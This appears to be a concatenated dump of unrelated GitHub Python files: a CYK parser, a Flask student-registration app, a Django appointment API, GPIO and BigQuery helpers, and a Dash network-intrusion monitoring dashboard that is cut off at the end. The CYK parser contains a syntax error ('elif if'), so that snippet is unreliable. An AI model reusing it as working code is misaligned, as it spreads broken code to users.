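# each table cell holds back-pointers: (production,) for a word, (production, k) with the split point k for a binary rule\n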
keep_cnf=keep_cnf)\n \n def build_trees(self, table: List, keep_cnf: bool) -> List:\n # check if we can retrieve at least one parse tree\n top_right_cell_lhs = [x[0].lhs() for x in table[0][-1]]\n if self.cnf.start() not in top_right_cell_lhs:\n return [] # not able to parse the sentence\n \n def move(back_ptr, i, j, pop=False):\n if len(back_ptr) == 1: # lexical production\n production = back_ptr[0]\n return Tree(\n node=production.lhs().symbol(), \n children=[production.rhs()[0]])\n else: # non-lexical productions\n k = back_ptr[-1]\n\n left_back_ptrs = [x for x in table[i][k] \n if x[0].lhs() == back_ptr[0].rhs()[0]]\n right_back_ptrs = [x for x in table[k][j] \n if x[0].lhs() == back_ptr[0].rhs()[1]]\n if not pop:\n if len(right_back_ptrs) > 1 and len(right_back_ptrs[0]) > 1:\n table[k][j].remove(right_back_ptrs[0])\n elif if len(left_back_ptrs) > 1 and len(left_back_ptrs[0]) > 1:\n table[i][k].remove(left_back_ptrs[0])\n subtree = Tree(\n node=back_ptr[0].lhs().symbol(),\n children=[move(left_back_ptrs[0], i, k, pop), \n move(right_back_ptrs[0], k, j, pop)])\n \n return subtree\n\n trees = []\n start = self.cnf.start()\n table[0][-1] = [x for x in table[0][-1] if x[0].lhs() == start]\n\n while True:\n production = table[0][-1][0]\n \n tree = Tree(\n node=start.symbol(), \n children=move(production, 0, len(table[0])-1))\n if tree in trees:\n break\n trees.append(tree)\n\n # Convert from CNF to original grammar format\n if not keep_cnf:\n trees = [self.to_cfg(tree) for tree in trees]\n\n # keep unique trees\n unique_trees = []\n while trees:\n tree = trees.pop()\n if tree not in unique_trees:\n unique_trees.append(tree)\n\n return unique_trees\n \n def to_cfg(self, tree):\n # change root label to original start\n tree.set_label(self.cfg.start().symbol())\n\n def traverse(subtree):\n root = subtree.label()\n production = Production(\n lhs=Nonterminal(root), \n rhs=[Nonterminal(child.label()) if isinstance(child, Tree) else child for child in subtree])\n if len(subtree) == 1: # terminal node\n if production not in self.cfg.productions():\n node = subtree.label()\n child = subtree[0]\n child_symbol = Nonterminal(child.label()) if isinstance(child, Tree) else child\n candidate = [x for x in self.cfg.productions(rhs=child_symbol) if len(x) == 1][0]\n intermediate = [x for x in self.cfg.productions(rhs=candidate.lhs()) if len(x) == 1]\n\n subtree = Tree(node=node, children=[Tree(node=intermediate[0].rhs()[0].symbol(), children=[child])])\n return traverse(subtree)\n return subtree\n else: \n if production not in self.cfg.productions():\n children = []\n for child in subtree:\n label = child.label()\n if label not in self.cfg_nonterminals:\n for grandchild in child:\n children.append(grandchild)\n else:\n children.append(child)\n subtree = Tree(node=root, children=children)\n return Tree(node=root, children=[traverse(child) if isinstance(child, Tree) else child for child in subtree])\n\n tree = traverse(tree)\n return tree\n\n\ndef to_cnf(cfg: CFG) -> CFG:\n \"\"\" Takes a CFG and returns its CNF.\n Four cases are handled here:\n 0. Make sure start non-terminal is never on the RHS\n 1. Productions that mix terminals and non-terminals on the RHS.\n 2. Productions with a single non-terminal on the RHS.\n 3. Productions with len(RHS) > 2\n \"\"\"\n if cfg.is_chomsky_normal_form():\n # no modification is required\n return cfg\n\n # 0. Make sure start non-terminal is never on the RHS\n cfg = validate_start(cfg)\n # Case 1. 
Productions that mix terminals and non-terminals on the RHS.\n cfg = un_mix_rhs(cfg)\n # 2. Productions with a single non-terminal on the RHS.\n cfg = remove_unary_productions(cfg)\n # 3. Productions with len(RHS) > 2\n cfg = make_binary_productions(cfg)\n\n assert cfg.is_chomsky_normal_form(), \"ERROR: CFG is still not in CNF.\"\n\n return cfg\n\n\ndef validate_start(cfg: CFG) -> CFG:\n start = cfg.start()\n\n for production in cfg.productions():\n if start in production.rhs():\n new_start = Nonterminal(\"_ROOT_\")\n new_production = Production(lhs=new_start, rhs=[start])\n cfg = CFG(\n start = new_start,\n productions = cfg.productions() + [new_production]\n )\n return cfg\n\n\ndef un_mix_rhs(cfg, terminal_pad:str='#') -> CFG:\n start = cfg.start()\n productions = set()\n\n for production in cfg.productions():\n if production.is_lexical() and len(production.rhs()) > 1: \n # Change terminals with non-terminals and add lexical productions\n # with len(RHS) == 1\n rhs = []\n for rhs_item in production.rhs():\n if isinstance(rhs_item, Nonterminal):\n rhs.append(rhs_item)\n else:\n non_terminal = Nonterminal(symbol=terminal_pad + rhs_item.upper())\n rhs.append(non_terminal)\n productions.add(Production(lhs=non_terminal, rhs=[rhs_item])) \n productions.add(Production(lhs=production.lhs(), rhs=rhs))\n else:\n productions.add(production)\n \n return CFG(start=start, productions=productions)\n\n\ndef remove_unary_productions(cfg: CFG)-> CFG:\n unary_productions = set()\n non_unary_productions = set()\n\n for production in cfg.productions():\n if production.is_lexical() or len(production) > 1:\n non_unary_productions.add(production)\n else:\n unary_productions.add(production)\n\n while unary_productions:\n unary_production = unary_productions.pop()\n unary_lhs = unary_production.lhs()\n unary_rhs = unary_production.rhs()[0]\n for production in cfg.productions(lhs=unary_rhs):\n merged_production = Production(lhs=unary_lhs, rhs=production.rhs())\n \n if merged_production.is_lexical() or len(merged_production) > 1:\n non_unary_productions.add(merged_production)\n else:\n unary_productions.add(merged_production)\n \n return CFG(cfg.start(), productions=non_unary_productions)\n\n\ndef make_binary_productions(cfg: CFG)-> CFG:\n valid_productions = set()\n invalid_productions = set()\n\n for production in cfg.productions():\n if (production.is_lexical() or (production.is_nonlexical() and len(production) == 2)):\n valid_productions.add(production)\n else:\n invalid_productions.add(production)\n \n while invalid_productions:\n invalid_production = invalid_productions.pop()\n lhs = invalid_production.lhs()\n rhs_first = invalid_production.rhs()[0]\n rhs_rest = invalid_production.rhs()[1:]\n new_non_terminal = Nonterminal(\n symbol='<' + lhs.symbol() + '-' + rhs_first.symbol() + '>')\n new_production = Production(\n lhs=invalid_production.lhs(), \n rhs=[rhs_first, new_non_terminal])\n valid_productions.add(new_production)\n new_non_terminal_production = Production(\n lhs=new_non_terminal, rhs=rhs_rest)\n if len(new_non_terminal_production) == 2:\n valid_productions.add(new_non_terminal_production)\n else:\n invalid_productions.add(new_non_terminal_production)\n \n return CFG(start=cfg.start(), productions=valid_productions)\n\n\ndef main():\n args = parse_args()\n\n with open(args.grammar_file) as f:\n cfg = f.read()\n \n cfg = CFG.fromstring(cfg)\n\n cyk = CYK(cfg=cfg)\n\n # res = cyk.parse(\"I shot the elephant in my pyjamas\")\n # res = cyk.parse(\"I shot an elephant in my pajamas\")\n # res = 
cyk.parse(\"Mary saw Bob\")\n # res = cyk.parse(\"the dog saw a man in the park\")\n # res = cyk.parse(\"the angry bear chased the frightened little squirrel\")\n # res = cyk.parse(\"Chatterer said Buster thought the tree was tall\")\n sentences_file = \"/home/pavlo/comp-550/comp-550-a2/input/sentences.txt\"\n with open(sentences_file) as f:\n lines = [line.strip() for line in f.readlines() if line.strip()]\n\n # res = cyk.parse(\"le chat mange le poisson\")\n for line in lines:\n res = cyk.parse(line)\n \n print(f\"{line} : {len(res)}\")\n\n # for r in res:\n # r.pretty_print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"paul-ruban/comp-550","sub_path":"comp-550-a2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16494274384","text":"import math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n n = int(input())\r\n res=0\r\n maxcount=0\r\n\r\n while n>0:\r\n if n%2==1:\r\n res+=1\r\n if res>maxcount:\r\n maxcount=res\r\n \r\n else:\r\n res=0\r\n \r\n n//=2\r\n print(maxcount)\r\n","repo_name":"NikhilHariharan/NikhilHariharan","sub_path":"Day10.py","file_name":"Day10.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26503185967","text":"\nimport socket\n\nfrom fluxmonitor.config import MAINBOARD_ENDPOINT, HEADBOARD_ENDPOINT\n\n\ndef create_mainboard_socket():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n s.connect(MAINBOARD_ENDPOINT)\n except Exception:\n s.close()\n raise\n\n return s\n\n\ndef create_toolhead_socket():\n s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n try:\n s.connect(HEADBOARD_ENDPOINT)\n except Exception:\n s.close()\n raise\n\n return s\n","repo_name":"flux3dp/delta-firmware","sub_path":"fluxmonitor/player/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"27052532350","text":"from dq0.sdk.data.sql.sql import SQL\n\ntry:\n from google.cloud import bigquery\n big_query_available = True\nexcept ImportError:\n big_query_available = False\n\n\nclass BigQuery(SQL):\n \"\"\"Data Source for BigQuery data.\n\n Provides function to read in BigQuery data.\n\n Args:\n connection_string (:obj:`str`): The BigQuery project.\n \"\"\"\n\n def __init__(self, connection_string):\n super().__init__(connection_string)\n self.type = 'bigquery'\n\n def execute(self, query, **kwargs):\n \"\"\"Execute SQL query\n\n Args:\n query: SQL Query to execute\n kwargs: keyword arguments\n\n Returns:\n SQL ResultSet as pandas dataframe\n \"\"\"\n # check query\n if query is None:\n raise ValueError('you need to pass a query parameter')\n\n # Construct a BigQuery client object.\n if not big_query_available:\n raise ImportError('big_query dependencies must be installed first')\n\n self.client = bigquery.Client()\n\n # make an API request\n query_job = self.client.query(query)\n\n # waits for query to complete\n query_job.result()\n\n # get the destination table for the query results\n destination = query_job.destination\n\n # Get the schema (and other properties) for the destination table.\n destination = self.client.get_table(destination)\n\n # details: 
https://github.com/googleapis/python-bigquery/blob/35627d145a41d57768f19d4392ef235928e00f72/google/cloud/bigquery/client.py\n rows = self.client.list_rows(\n destination,\n selected_fields=None,\n max_results=None,\n page_token=None,\n start_index=None,\n page_size=None,\n )\n\n # either create temporary table or return result set as dataframe\n df = rows.to_dataframe(create_bqstorage_client=False)\n\n # return pandas dataframe\n return df\n","repo_name":"gradientzero/dq0-sdk","sub_path":"dq0/sdk/data/sql/big_query.py","file_name":"big_query.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23654411366","text":"from photo import Photo\nfrom signal import pause\nfrom time import sleep\nfrom gpiozero import LED, Button\n\n# Read the configuration\nexec(open('config.py').read())\n\n\nprint(\"Welcome to Python on Docker (print)\")\n\nled_green = LED(PIN_LIGHT_GREEN)\nled_yellow = LED(PIN_LIGHT_YELLOW)\nled_red = LED(PIN_LIGHT_RED)\nled_flash = LED(PIN_LIGHT_FLASH)\n#\n# while True:\n# led.on()\n# print('Light on')\n# sleep(1)\n# led.off()\n# print('Light off')\n# sleep(1)\n\n\n# Read the configuration\nexec(open('./config.py').read())\n\n# Project version number\n__version__ = '0.0.1'\n\n\ndef led_on():\n print(\"On!\")\n led_green.on()\n led_yellow.on()\n led_red.on()\n led_flash.on()\n\n\ndef led_off():\n print(\"Off!\")\n led_green.off()\n led_yellow.off()\n led_red.off()\n led_flash.off()\n\n\nbutton = Button(PIN_BUTTON)\nbutton.when_pressed = led_on\nbutton.when_released = led_off\n\n# image = Photo(PIN_OUTPUT_A, PIN_LIGHT_RED)\n# print(image.file_name)\n\npause()\n","repo_name":"vergissberlin/phart","sub_path":"app/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70318408168","text":"from flask import Flask,render_template,request\nimport csv\nimport pandas as pd\n\napp = Flask(__name__)\n\nclass Students:\n\n def Register(self, studentID, studentName, gender, dob, city, state, studentEmail, qualification, stream):\n self.studentID=studentID\n self.studentName=studentName\n self.gender=gender\n self.dob=dob\n self.city=city\n self.state=state\n self.studentEmail=studentEmail\n self.qualification=qualification\n self.stream=stream\n with open('students.csv', mode='a',newline='') as students:\n colleges_writer = csv.writer(students, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n colleges_writer.writerow([self.studentID,self.studentName,self.gender,self.dob,self.city,self.state,self.studentEmail,self.qualification, self.stream])\n\n def Display(self):\n clg = pd.read_csv('students.csv', header=None,names=['Student_ID', 'Student_Name', 'Gender', 'DoB', 'City', 'State', 'Student_Email','Qualification', 'Stream'])\n clg.set_index('Student_ID')\n return clg\n\n\n def Filter(self, id):\n self.id=id\n list=[self.id]\n clg = pd.read_csv('students.csv', header=None, names=['Student_ID', 'Student_Name', 'Gender', 'DoB', 'City', 'State', 'Student_Email','Qualification', 'Stream'])\n clg.set_index('Student_ID')\n return clg[clg.Student_ID.isin(list)]\n # return clg.values.tolist()\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n if request.method == \"POST\":\n studentID = request.form['id']\n studentName = request.form['name']\n gender = 
request.form['gender']\n dob = request.form['dob']\n city = request.form['city']\n state = request.form['state']\n studentEmail = request.form['email']\n qualification = request.form['qualification']\n stream = request.form['stream']\n clgreg = Students()\n clgreg.Register(studentID,studentName,gender,dob,city,state,studentEmail,qualification,stream)\n return render_template(\"index.html\", alert='Student ID '+studentID+' Successfully Registered!')\n return render_template(\"add_student.html\")\n\n@app.route(\"/display\", methods=[\"GET\", \"POST\"])\ndef display():\n clgdel = Students()\n try:\n x = clgdel.Display()\n except(FileNotFoundError):\n return render_template(\"display.html\", info=\"No record.\")\n return render_template(\"display.html\", column_names=x.columns.values, row_data=list(x.values.tolist()))\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef filter_display():\n if request.method == \"POST\":\n studentID=request.form['studentId']\n clgfilt=Students()\n try:\n x=clgfilt.Filter(studentID)\n except(FileNotFoundError):\n return render_template(\"search_id.html\", info=\"No record.\")\n row = list(x.values.tolist())\n if not row:\n return render_template(\"search_id.html\", info=\"No data found.\")\n else:\n row = row[0]\n return render_template(\"search_id.html\", header=None, length=len(row), column_names=x.columns.values, row_data=row)\n return render_template(\"search_id.html\")\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"debashish-choudhury/student-registration-form","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18119846655","text":"from core.api.serializers import AppointmentSerializer, DepartmentSerializer, DoctorSerializer\nfrom rest_framework.response import Response\nfrom core.models import Department, Doctor, Apointment\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nfrom django.core.mail import send_mail\n\n@api_view(['POST'])\ndef add_appointment(request):\n serializer = AppointmentSerializer(data=request.data)\n print(request.data)\n if serializer.is_valid():\n serializer.save()\n else:\n return Response(\n serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n return Response(\n serializer.data, \n status=status.HTTP_201_CREATED)\n\n@api_view(['GET'])\ndef get_departments(request):\n departments = Department.objects.all()\n serializer = DepartmentSerializer(departments, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n@api_view(['GET'])\ndef get_doctors(request):\n doctors = Doctor.objects.all()\n serializer = DoctorSerializer(doctors, many=True)\n return Response(\n serializer.data, status=status.HTTP_200_OK)\n\n\n","repo_name":"itsregalo/carepoint-physiotherapt-backend","sub_path":"core/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17713906871","text":"import json\nimport base64\nimport datetime\nimport requests\nimport pathlib\nimport math\nimport pandas as pd\nimport flask\nimport dash\nimport dash_table\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport dash_bootstrap_components as dbc\nimport plotly.graph_objs as go\nimport app.plot_helper as ph\nimport app.data_helper as dh\nimport os\n\n\nfrom dash.dependencies import Input, Output, State\nfrom 
plotly import tools\n\n\nmonitor_time_interval = 60\n\n# set base app directory path\nAPP_PATH = pathlib.Path(__file__).parent.resolve()\n\n\ndh = dh.IDSData()\ndh.read_source(\"conn\")\n\nproject_branch = os.environ[\"PROJECT_BRANCH\"]\nif project_branch.endswith(\"green\"):\n project_color = \"green\"\nelif project_branch.endswith(\"blue\"):\n project_color = \"blue\"\nelse:\n project_color = \"grey\" # assumed fallback so project_color is always defined\n\n\n# Lists for Project Menu and associated Icons\nacc_str_list = [\"CONCEPT\",\n \"MONITOR TRAFFIC\",\n \"CRAWL N TRAIN\",\n \"APPLY MODEL\"\n ]\n\nsvg_icon_src = [\"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/71438.svg\",\n \"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/monitor.svg\",\n \"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/164053.svg\",\n \"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/cloud-computing.svg\"]\n\n\n### Assistance Functions for creating HTML content ###\n\ndef make_items(acc_str_list, svg_icon_src):\n '''\n Populates the Bootstrap accordion menu from the given input arguments.\n The given DOM id's are crucial for app callbacks, therefore shouldn't be modified.\n\n INPUT:\n acc_str_list - (list) List of strings with Top Menu Bullets\n svg_icon_src - (list) List of icon image URLs, one per menu bullet\n OUTPUT:\n card_list - (list of dash HTML objects) Will hold all menu points\n '''\n card_list = []\n for acc_str, svg_icon in zip(acc_str_list, svg_icon_src):\n card_list.append(html.Div(\n id=f\"menuitem-{acc_str}\",\n children=[\n dbc.CardHeader([\n dbc.Row([\n html.Span(id=f\"spandot-{acc_str}\",\n className=\"menuicon-inactive\",\n children=[\n html.Span(id=f\"spandoti-{acc_str}\",\n style={\n \"height\": \"40px\",\n \"width\": \"40px\",\n \"background-image\": f\"url({svg_icon})\",\n \"background-repeat\": \"no-repeat\",\n \"display\": \"grid\"\n }\n )]\n\n ),\n dbc.Button(\n f\"{acc_str}\",\n id=f\"button-{acc_str}\",\n color=\"link\",\n style={\"padding-top\": 10,\n \"font-color\": \"orange\",\n \"align\": \"center\"}\n\n )\n ], className=\"menurow\",\n id=f\"row-{acc_str}\",\n style={\"display\": \"inline-flex\",\n \"align-items\": \"center\",\n \"padding-left\": 5,\n \"padding-right\": 20}\n )\n ], className=\"menucard\",\n id=f\"menucard-{acc_str}\"\n )\n ]))\n\n return card_list\n\n\n### BASIC WEB APP LAYOUT ###\n\n# NAVBAR\n\nNAVBAR = dbc.Navbar(\n children=[\n\n dbc.Row(\n [\n dbc.Col(html.A(html.Img(src=\"https://abload.de/img/bwi_dataanalyticshack7ujy4.png\",\n height=\"40px\"), href=\"https://www.bwi.de\"), width=2),\n dbc.Col(dbc.NavbarBrand(dbc.Row([\n html.P(\"BroAI\", style={\"color\": \"#FF0000\"}),\n html.P(\n \"(KI - Cyber Security)\",\n style={\n \"color\": \"orange\"}),\n html.P(\"\", style={\"margin-left\": \"15px\"}),\n html.P(\"Deployment: \" + project_branch, style={\"color\": project_color})], align=\"center\")), width=7),\n\n dbc.Col(dbc.DropdownMenu(\n children=[\n dbc.DropdownMenuItem(\"blubb\",\n href=\"blubb\"),\n dbc.DropdownMenuItem(\"blubb\",\n href=\"blubb\"),\n\n ],\n nav=False,\n in_navbar=True,\n label=\"by Team NastyNULL\",\n style={\"color\": \"white\", \"font-size\": 10,\n \"font-weight\": \"lighter\"},\n ), width=2),\n\n\n ],\n align=\"center\",\n no_gutters=True,\n style={\"width\": \"100%\"}\n ),\n\n\n ],\n color=\"dark\",\n dark=True,\n sticky=\"top\",\n style={\n \"background-image\": 
\"url('https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/image.png')\"}\n)\n\n\n# Basic Web App Skeleton\n\nLEFT_COLUMN = dbc.Jumbotron(\n [\n html.Div(make_items(acc_str_list, svg_icon_src),\n className=\"accordion\"),\n ], style={\"padding\": \"0rem 1rem 1rem 1rem\"}\n)\n\nRIGHT_COLUMN = html.Div(id=\"right_column\", children=[\n html.Div(id=\"right_column_loading\")])\n\n\nBODY = dbc.Container([\n dbc.Row(\n [\n dbc.Col(LEFT_COLUMN, md=1),\n dbc.Col(RIGHT_COLUMN, md=11),\n ],\n style={\"marginTop\": 20},\n ),\n\n], fluid=True)\n\n\n### Functions where Plothelper and Datahelper comes together ###\n\ndef return_ip_bar_chart(file_type=\"\", timespan=\"\"):\n data_dict = dh.get_ten_most_source_ip(file_type, timespan)\n\n return ph.plot_ten_most_ip(data_dict, title=\"\", dash=True)\n\n\ndef return_ip_bar_dest_chart(file_type=\"\", timespan=\"\"):\n data_dict = dh.get_ten_most_dest_ip(file_type, timespan)\n\n return ph.plot_ten_most_ip(data_dict, title=\"\", dash=True)\n\n\ndef return_data_table(file_type=\"\", timespan=\"\"):\n df = dh.get_timespan_df(file_type, timespan * 60)\n\n return ph.plot_data_table(df.tail(50), fig=\"\", title=\"\")\n\n\ndef return_scatter(file_type=\"\", timespan=\"\"):\n df = dh.get_timespan_df(file_type, timespan * 60)\n\n return ph.plot_monitor_scatter(df, title=\"\", dash=True)\n\n\ndef return_world(file_type=\"\", timespan=\"\"):\n data_dict = dh.get_longitude_latitude(file_type, timespan)\n return ph.get_world_plot(data_dict, dash=True)\n\n\ndef return_apply_table():\n df = dh.get_timespan_df(\"conn\", dh.anomaly_detection_counter + 600)\n\n pred = dh.return_anomaly_prediction(df)\n\n plot_df = df.tail(99)\n print(plot_df.shape)\n plot_df[\"Prediction_AD\"] = pred\n return ph.plot_prediction_table(plot_df, fig=\"\", title=\"\")\n\n\ndef return_anomaly_model(file_type=\"\", train_offset=\"\", counter_offset=\"\"):\n\n X_train, xx, yy, Z = dh.train_anomaly_detection(\n file_type, train_offset, counter_offset)\n return ph.plot_anomaly(X_train, xx, yy, Z)\n\n\nWORLD_MAP = \"\"\nMONITOR_SCATTER = \"\"\n\n\ntimespan_labels = [\"15min\", \"30min\", \"1h\", \"5h\", \"12h\", \"24h\"]\ntimespan_values = [15, 30, 60, 300, 720, 1440]\n\ntimespan_list = []\nfor label, value in zip(timespan_labels, timespan_values):\n timespan_list.append({\"label\": label,\n \"value\": value})\n\n\nanomaly_counter_labels = [\"5min\", \"10min\", \"15min\", \"30min\", \"1h\"]\nanomaly_counter_values = [5 * 60, 10 * 60, 15 * 60, 30 * 60, 60 * 60]\n\nanomaly_counter_list = []\nfor label, value in zip(anomaly_counter_labels, anomaly_counter_values):\n anomaly_counter_list.append({\"label\": label,\n \"value\": value})\n\n\nanomaly_span_labels = [\"3h\", \"6h\", \"12h\", \"24h\", \"48h\", \"72h\"]\nanomaly_span_values = [3, 6, 12, 24, 48, 72]\n\n\nanomaly_span_list = []\nfor label, value in zip(anomaly_span_labels, anomaly_span_values):\n anomaly_span_list.append({\"label\": label,\n \"value\": value})\n\n\nMONITOR_TIME_DROPDOWN = html.Div([\n dcc.Dropdown(id='monitor_time_dropdown',\n options=timespan_list,\n value=60), ], style={\"width\": \"100%\", \"color\": \"black\"})\n\nMONITOR_TIME_LABEL = html.Label(\"Timespan:\",\n style={\"padding-left\": 5,\n \"padding\": 10})\n\n\nANOMALY_COUNTER_DROPDOWN = html.Div([\n dcc.Dropdown(id='anomaly_counter_dropdown',\n options=anomaly_counter_list,\n value=5 * 60), ], style={\"width\": \"100%\", \"color\": \"black\"})\n\n\nANOMALY_SPAN_DROPDOWN = html.Div([\n dcc.Dropdown(id='anomaly_span_dropdown',\n options=anomaly_span_list,\n 
value=72), ], style={\"width\": \"100%\", \"color\": \"black\"})\n\nANOMALY_LABEL = html.Label(\"Choose Anomaly Model:\",\n style={\"padding-left\": 5,\n \"padding\": 10})\n\n\n### MENU BASED CONTENT ###\n\n# CONCEPT\n\nCONCEPT = html.Img(\n src=\"https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/pitch_final.png\", style={\"width\": \"100%\"})\n\n# MONITOR TRAFFIC\n\nMONITOR_FRONTEND = [dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"Controls\")), dbc.CardBody(\n [MONITOR_TIME_LABEL, MONITOR_TIME_DROPDOWN])], md=1),\n dbc.Col([dbc.CardHeader(html.H5(\"Most frequently Source IPs\")),\n dbc.CardBody(dcc.Loading(\n dcc.Graph(figure=\"\", id=\"most_ip_plot\"), color=\"#FF0000\"))\n ], md=3),\n dbc.Col([dbc.CardHeader(html.H5(\"Most frequently Destination IPs\")),\n dbc.CardBody(dcc.Loading(\n dcc.Graph(figure=\"\", id=\"most_ip_dest_plot\"), color=\"#FF0000\"))\n ], md=3),\n dbc.Col([dbc.CardHeader(html.H5(\"Location of Source IPs\")),\n dbc.CardBody(dcc.Loading(dcc.Graph(figure=\"\", id=\"world_map_plot\"), color=\"#FF0000\"))])\n ]),\n dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"Connection List\")), dbc.CardBody(\n html.Div(children=[], id=\"monitor_data_table\"))]),\n dbc.Col([dbc.CardHeader(html.H5(\"Connection over Time\")),\n dbc.CardBody(dcc.Loading(dcc.Graph(figure=\"\", id=\"monitor_scatter_plot\"), color=\"#FF0000\"))])\n ]),\n dcc.Interval(id='table_update', interval=1 *\n 10000, n_intervals=0)\n ]\n\n\n# CRAWLIN N TRAIN\n\nroccurve = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/Selection_006.png)\n\"\"\"\n\nroccurve_zoom = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/Selection_007.png)\n\"\"\"\n\nnn_confusion = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/nn_confusion_matrix_v1.png)\n\"\"\"\n\nrf_confusion = \"\"\"\n![](https://raw.githubusercontent.com/herrfeder/herrfeder.github.io/master/random_forest_confusion_matrix_v2.png)\n\"\"\"\n\n\ntab1_content = [dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"ROC Curves\")), dbc.CardBody(\n dcc.Markdown(roccurve, className=\"image_big\"))], md=6),\n dbc.Col([dbc.CardHeader(html.H5(\"ROC Curves Zoom\")), dbc.CardBody(dcc.Markdown(roccurve_zoom, className=\"image_big\"))], md=6), ]),\n dbc.Row(children=[\n dbc.Col([dbc.CardHeader(html.H5(\"Random Forest Confusion Matrix\")), dbc.CardBody(\n dcc.Markdown(rf_confusion))], md=6),\n dbc.Col([dbc.CardHeader(html.H5(\"Neuronal Network Confusion Matrix\")), dbc.CardBody(dcc.Markdown(nn_confusion))], md=6), ]),\n]\n\n\ntab2_content = dbc.Row(children=[\n dbc.Card(\n dbc.CardBody(\n [dbc.Col(children=[html.Label(\"Anomaly Counter Range:\", style={\"padding-left\": 5, \"padding\": 10}),\n ANOMALY_COUNTER_DROPDOWN,\n html.Label(\"Anomaly Span Range:\", style={\n \"padding-left\": 5, \"padding\": 10}),\n ANOMALY_SPAN_DROPDOWN,\n dbc.Button(\"Train Anomaly Detection Model\", id=\"anomaly_submit\", color=\"success\")]),\n\n\n dbc.Col(children=[dcc.Loading(dcc.Graph(id=\"anomaly_result\"), color=\"#FF0000\", className=\"loading_anomaly\")])]\n\n\n ),\n style={\"padding-top\": \"20px\", \"width\": \"80%\"}\n\n )])\n\n\nTRAINING = dbc.Tabs(\n [\n dbc.Tab(tab1_content, label=\"Random Forest & Neural Net\"),\n dbc.Tab(tab2_content, label=\"Anomaly Detection\"),\n\n ])\n\n\n# APPLY MODEL\n\nAPPLY_FRONTEND = [dbc.Row(children=[html.Div(children=[], id=\"apply_dummy\"),\n dbc.Col([dbc.CardHeader(html.H5(\"Predict Attacks\")), 
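# populated at runtime by the update_apply_data callback on the apply_update interval\n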
dbc.CardBody(html.Div(children=[], id=\"apply_data_table\"))\n ]),\n ]),\n dcc.Interval(id='apply_update', interval=1 *\n 5000, n_intervals=0),\n ]\n\n\n### WEBAPP INIT ###\n\napp = dash.Dash(__name__,\n external_stylesheets=[dbc.themes.DARKLY],\n url_base_pathname=\"/\",\n meta_tags=[\n {\"name\": \"viewport\",\n \"content\": \"width=device-width, initial-scale=1.0\"}\n ],\n )\n\napp.layout = html.Div(children=[NAVBAR, BODY])\napp.config['suppress_callback_exceptions'] = True\napp.css.config.serve_locally = True\napp.scripts.config.serve_locally = True\n\nserver = app.server\n\n\n### CALLBACKS ###\n\n\n# create anomaly model and output visualisation of isolation forest\n@app.callback(Output('anomaly_result', 'figure'),\n [Input('anomaly_counter_dropdown', 'value'),\n Input('anomaly_span_dropdown', 'value'),\n Input('anomaly_submit', 'n_clicks')])\ndef return_anomaly(counter_value, span_value, anomaly_click):\n dh.update_source(\"conn\")\n\n return return_anomaly_model(\n file_type=\"conn\", train_offset=span_value, counter_offset=counter_value)\n\n# output table with predictions\n\n\n@app.callback(Output('apply_data_table', 'children'),\n [Input('apply_update', 'n_intervals'), ])\ndef update_apply_data(n_intervals):\n dh.update_source(\"conn\")\n\n return return_apply_table()\n\n\n# update output table\n@app.callback([Output('monitor_data_table', 'children'),\n Output('most_ip_plot', 'figure'),\n Output('most_ip_dest_plot', 'figure'),\n Output('monitor_scatter_plot', 'figure'),\n Output('world_map_plot', 'figure')],\n [Input('table_update', 'n_intervals'),\n Input('monitor_time_dropdown', 'value')])\ndef update_monitor_table(n_intervals, monitor_time_interval):\n dh.update_source(\"conn\")\n return (return_data_table(\"conn\", timespan=monitor_time_interval),\n return_ip_bar_chart(\"conn\", timespan=monitor_time_interval),\n return_ip_bar_dest_chart(\"conn\", timespan=monitor_time_interval),\n return_scatter(\"conn\", timespan=monitor_time_interval),\n return_world(\"conn\", timespan=monitor_time_interval))\n\n\n# Menu control function\nacc_input = [Input(f\"menuitem-{i}\", \"n_clicks\") for i in 